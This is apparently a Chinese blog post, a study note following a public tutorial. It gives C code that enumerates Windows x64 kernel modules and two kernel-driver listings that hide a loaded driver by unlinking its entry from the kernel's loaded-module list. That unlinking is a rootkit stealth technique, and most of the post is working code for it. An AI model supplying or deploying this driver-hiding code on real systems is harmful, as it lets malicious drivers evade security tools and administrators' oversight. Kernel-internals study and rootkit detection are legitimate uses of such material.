这个还是根据作者Tesla.Angela所开源的教程写的东西 感谢作者 无私奉献的精神
先说枚举 枚举是在应用层实现的 这里的精髓就是找到了 了 WIN64 上 SYSTEM_MODULE_INFORMATION 正确 的结构体定义 如果这个结构 找不对 那么 程序肯定是不对的
然后 用的是 函数 ZwQuerySystemInformation 的 第11号功能 查询 模块信息
直接看代码吧 这个代码 是根据我 作者开源的代码 所写
#include <stdio.h>
#include <Windows.h>
typedef NTSTATUS (*ZWQUERYSYSTEMINFORMATION)
(
IN ULONG SystemInformationClass,
OUT PVOID SystemInformation,
IN ULONG Length,
OUT PULONG ReturnLength
);
typedef unsigned long DWORD;
typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY
{
ULONG Unknow1;
ULONG Unknow2;
ULONG Unknow3;
ULONG Unknow4;
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT ModuleNameOffset;
char ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct _SYSTEM_MODULE_INFORMATION
{
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation;
VOID Find(char* FindName)
{
BOOL flag = 0;
ULONG NeedSize, ModuleCount, BufferSize = 0x5000;
PVOID pBuffer=NULL;
PCHAR pName=NULL;
NTSTATUS Result;
PSYSTEM_MODULE_INFORMATION pSystemModuleInformation;
do
{
pBuffer = malloc(BufferSize);
if (pBuffer == NULL)
return;
Result = ZwQuerySystemInformation(11, pBuffer, BufferSize, &NeedSize);
if (Result == 0xC0000004L)
{
free(pBuffer);
BufferSize *= 2;
}
else if (Result<0)
{
//查询失败则退出
free(pBuffer);
return;
}
} while (Result == 0xC0000004L);
pSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)pBuffer;
ModuleCount = pSystemModuleInformation->Count;
for (int i = 0; i < ModuleCount; i++)
{
if ((ULONG64)(pSystemModuleInformation->Module[i].Base)>(ULONG64)0x8000000000000000)
{
pName = pSystemModuleInformation->Module[i].ImageName + pSystemModuleInformation->Module[i].ModuleNameOffset;
printf("0x%llx\t%s", (ULONG64)pSystemModuleInformation->Module[i].Base, pName);
if (_stricmp(pName, FindName) == 0)
{
printf("\t\t<--------------------");
flag = 1;
}
printf("\n");
}
}
if (flag)
{
printf("寻找到了指定内核模块!\n");
}
else
{
printf("很遗憾 没有找到!\n");
}
}
int main()
{
ZwQuerySystemInformation=(ZWQUERYSYSTEMINFORMATION)GetProcAddress(LoadLibraryW(L"ntdll.dll"),"ZwQuerySystemInformation");
Find("win32k.sys");
getchar();
return 0;
}
在windows10 完美运行
然后下面就是隐藏了
隐藏 就是上一个博客说的断链了
这里 其实应该有两种方法的 下面是参考作者 写出的代码
#include<ntddk.h>
#include <Ntddkbd.h>
NTSYSAPI NTSTATUS NTAPI ZwQuerySystemInformation
(
IN ULONG SystemInformationClass,
OUT PVOID SystemInformation,
IN ULONG Length,
OUT PULONG ReturnLength
);
typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY
{
ULONG Unknow1;
ULONG Unknow2;
ULONG Unknow3;
ULONG Unknow4;
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT ModuleNameOffset;
char ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct _SYSTEM_MODULE_INFORMATION
{
ULONG Count;//内核中以加载的模块的个数
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
typedef struct _KLDR_DATA_TABLE_ENTRY
{
LIST_ENTRY64 InLoadOrderLinks;
ULONG64 __Undefined1;
ULONG64 __Undefined2;
ULONG64 __Undefined3;
ULONG64 NonPagedDebugInfo;
ULONG64 DllBase;
ULONG64 EntryPoint;
ULONG SizeOfImage;
UNICODE_STRING FullDllName;
UNICODE_STRING BaseDllName;
ULONG Flags;
USHORT LoadCount;
USHORT __Undefined5;
ULONG64 __Undefined6;
ULONG CheckSum;
ULONG __padding1;
ULONG TimeDateStamp;
ULONG __padding2;
}KLDR_DATA_TABLE_ENTRY, *PKLDR_DATA_TABLE_ENTRY;
PDRIVER_OBJECT DriverObject = NULL;
ULONG64 GetSystemModuleBase(char* lpModuleName)
{
ULONG NeedSize, i, ModuleCount, BufferSize = 0x5000;
PVOID pBuffer = NULL;
PCHAR pDrvName = NULL;
NTSTATUS Result;
PSYSTEM_MODULE_INFORMATION pSystemModuleInformation;
do
{
pBuffer = ExAllocatePool(NonPagedPool,BufferSize);
if (pBuffer == NULL)
return 0;
Result = ZwQuerySystemInformation(11, pBuffer, BufferSize, &NeedSize);
if (Result == STATUS_INFO_LENGTH_MISMATCH)
{
ExFreePool(pBuffer);
BufferSize *= 2;
}
else if (!NT_SUCCESS(Result))
{
ExFreePool(pBuffer);
return 0;
}
} while (Result == STATUS_INFO_LENGTH_MISMATCH);
pSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)pBuffer;
ModuleCount = pSystemModuleInformation->Count;
for (i = 0; i < ModuleCount; i++)
{
if ((ULONG64)(pSystemModuleInformation->Module[i].Base) >(ULONG64)0x8000000000000000)
{
pDrvName = pSystemModuleInformation->Module[i].ImageName + pSystemModuleInformation->Module[i].ModuleNameOffset;
if (_stricmp(pDrvName, lpModuleName) == 0)
return (ULONG64)pSystemModuleInformation->Module[i].Base;
}
}
ExFreePool(pBuffer);
return 0;
}
VOID HideDriver(char *pDrvName)
{
PKLDR_DATA_TABLE_ENTRY entry = (PKLDR_DATA_TABLE_ENTRY)DriverObject->DriverSection;
PKLDR_DATA_TABLE_ENTRY firstentry;
ULONG64 pDrvBase = 0;
KIRQL OldIrql;
firstentry = entry;
pDrvBase = GetSystemModuleBase(pDrvName);
while ((PKLDR_DATA_TABLE_ENTRY)entry->InLoadOrderLinks.Flink != firstentry)
{
if (entry->DllBase == pDrvBase)
{
OldIrql = KeRaiseIrqlToDpcLevel();
((LIST_ENTRY64*)(entry->InLoadOrderLinks.Flink))->Blink = entry->InLoadOrderLinks.Blink;
((LIST_ENTRY64*)(entry->InLoadOrderLinks.Blink))->Flink = entry->InLoadOrderLinks.Flink;
entry->InLoadOrderLinks.Flink = 0;
entry->InLoadOrderLinks.Blink = 0;
KeLowerIrql(OldIrql);
DbgPrint("Remove LIST_ENTRY64 OK!");
break;
}
DbgPrint("%llx\t%wZ\t%wZ", entry->DllBase, entry->BaseDllName, entry->FullDllName);
entry = (PKLDR_DATA_TABLE_ENTRY)entry->InLoadOrderLinks.Flink;
}
}
VOID Unload(PDRIVER_OBJECT pDriverObject)
{
KdPrint(("开始卸载!\n"));
}
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegPath)
{
pDriverObject->DriverUnload = Unload;
DriverObject = pDriverObject;
HideDriver("win32k.sys");
return STATUS_SUCCESS;
}
#include<ntddk.h>
#include <Ntddkbd.h>
NTSYSAPI NTSTATUS NTAPI ZwQuerySystemInformation
(
IN ULONG SystemInformationClass,
OUT PVOID SystemInformation,
IN ULONG Length,
OUT PULONG ReturnLength
);
typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY
{
ULONG Unknow1;
ULONG Unknow2;
ULONG Unknow3;
ULONG Unknow4;
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT ModuleNameOffset;
char ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct _SYSTEM_MODULE_INFORMATION
{
ULONG Count;//内核中以加载的模块的个数
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
typedef struct _KLDR_DATA_TABLE_ENTRY
{
LIST_ENTRY64 InLoadOrderLinks;
ULONG64 __Undefined1;
ULONG64 __Undefined2;
ULONG64 __Undefined3;
ULONG64 NonPagedDebugInfo;
ULONG64 DllBase;
ULONG64 EntryPoint;
ULONG SizeOfImage;
UNICODE_STRING FullDllName;
UNICODE_STRING BaseDllName;
ULONG Flags;
USHORT LoadCount;
USHORT __Undefined5;
ULONG64 __Undefined6;
ULONG CheckSum;
ULONG __padding1;
ULONG TimeDateStamp;
ULONG __padding2;
}KLDR_DATA_TABLE_ENTRY, *PKLDR_DATA_TABLE_ENTRY;
PDRIVER_OBJECT DriverObject = NULL;
UNICODE_STRING uString;
ULONG64 GetSystemModuleBase(char* lpModuleName)
{
ULONG NeedSize, i, ModuleCount, BufferSize = 0x5000;
PVOID pBuffer = NULL;
PCHAR pDrvName = NULL;
NTSTATUS Result;
PSYSTEM_MODULE_INFORMATION pSystemModuleInformation;
do
{
pBuffer = ExAllocatePool(NonPagedPool,BufferSize);
if (pBuffer == NULL)
return 0;
Result = ZwQuerySystemInformation(11, pBuffer, BufferSize, &NeedSize);
if (Result == STATUS_INFO_LENGTH_MISMATCH)
{
ExFreePool(pBuffer);
BufferSize *= 2;
}
else if (!NT_SUCCESS(Result))
{
ExFreePool(pBuffer);
return 0;
}
} while (Result == STATUS_INFO_LENGTH_MISMATCH);
pSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)pBuffer;
ModuleCount = pSystemModuleInformation->Count;
for (i = 0; i < ModuleCount; i++)
{
if ((ULONG64)(pSystemModuleInformation->Module[i].Base) >(ULONG64)0x8000000000000000)
{
pDrvName = pSystemModuleInformation->Module[i].ImageName + pSystemModuleInformation->Module[i].ModuleNameOffset;
if (_stricmp(pDrvName, lpModuleName) == 0)
return (ULONG64)pSystemModuleInformation->Module[i].Base;
}
}
ExFreePool(pBuffer);
return 0;
}
VOID HideDriver()
{
PKLDR_DATA_TABLE_ENTRY entry = (PKLDR_DATA_TABLE_ENTRY)DriverObject->DriverSection;
PKLDR_DATA_TABLE_ENTRY firstentry;
ULONG64 pDrvBase = 0;
KIRQL OldIrql;
firstentry = entry;
//pDrvBase = GetSystemModuleBase(pDrvName);
while ((PKLDR_DATA_TABLE_ENTRY)entry->InLoadOrderLinks.Flink != firstentry)
{
if (RtlEqualUnicodeString(&(entry->BaseDllName), &uString,TRUE))
{
OldIrql = KeRaiseIrqlToDpcLevel();
((LIST_ENTRY64*)(entry->InLoadOrderLinks.Flink))->Blink = entry->InLoadOrderLinks.Blink;
((LIST_ENTRY64*)(entry->InLoadOrderLinks.Blink))->Flink = entry->InLoadOrderLinks.Flink;
entry->InLoadOrderLinks.Flink = 0;
entry->InLoadOrderLinks.Blink = 0;
KeLowerIrql(OldIrql);
DbgPrint("Remove LIST_ENTRY64 OK!");
break;
}
DbgPrint("%llx\t%wZ\t%wZ", entry->DllBase, entry->BaseDllName, entry->FullDllName);
entry = (PKLDR_DATA_TABLE_ENTRY)entry->InLoadOrderLinks.Flink;
}
}
VOID Unload(PDRIVER_OBJECT pDriverObject)
{
KdPrint(("开始卸载!\n"));
}
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegPath)
{
pDriverObject->DriverUnload = Unload;
DriverObject = pDriverObject;
RtlInitUnicodeString(&uString, L"win32k.sys");
HideDriver();
return STATUS_SUCCESS;
}